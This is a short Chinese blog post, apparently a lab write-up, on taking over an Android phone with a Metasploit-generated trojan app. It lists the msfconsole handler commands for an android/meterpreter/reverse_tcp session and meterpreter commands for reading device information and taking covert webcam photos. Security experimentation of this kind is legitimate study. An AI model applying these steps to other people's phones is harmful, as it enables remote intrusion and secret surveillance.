内容字号:默认大号超大号

段落设置:段首缩进取消段首缩进

字体设置:切换到微软雅黑切换到宋体

记一次msfconsole_android渗透实验

2018-11-06 20:36 出处:清屏网 人气: 评论(0

1>查看本机IP

2>生成App木马

3>将生成的木马安装至手机

4>打开msfconsole

1,  user exploit/multi/handler  加载模块、

2, set payload android/meterpreter/reverse_tcp  选择Payload

3,show options  查看参数设置

5>更改设置

1, set LHOST 192.168.0.102   设置为我们生成木马的IP地址

2, set LPORT 4444 设置为生成木马的监听端口

3, exploit   执行漏洞 ,开始监听

6>建立连接

当app被点击后,会无任何反应(应该会有一条连接记录的)

但是,我在实验时,并无效果(后来将app卸载时,添加了一条会话)

但是,使用sysinfo查看手机信息时:连接超时

于是再次安装App,允许所有权限,装完后点击打开,连接被建立

查看手机信息:sysinfo

查看有几个摄像头:webcam_list

隐秘拍照功能:webcam_snap  // -i 指定那个摄像头

(在试验时应用提示授权,授权后可以实现隐秘拍摄)

开启摄像头:webcam_stream

会打开一个HTML文件( 略显卡顿)

最后再来一张网络上的图:

分享给小伙伴们:
本文标签: msfconsole_a

相关文章

发表评论愿您的每句评论,都能给大家的生活添色彩,带来共鸣,带来思索,带来快乐。

CopyRight © 2015-2016 QingPingShan.com , All Rights Reserved.

清屏网 版权所有 豫ICP备15026204号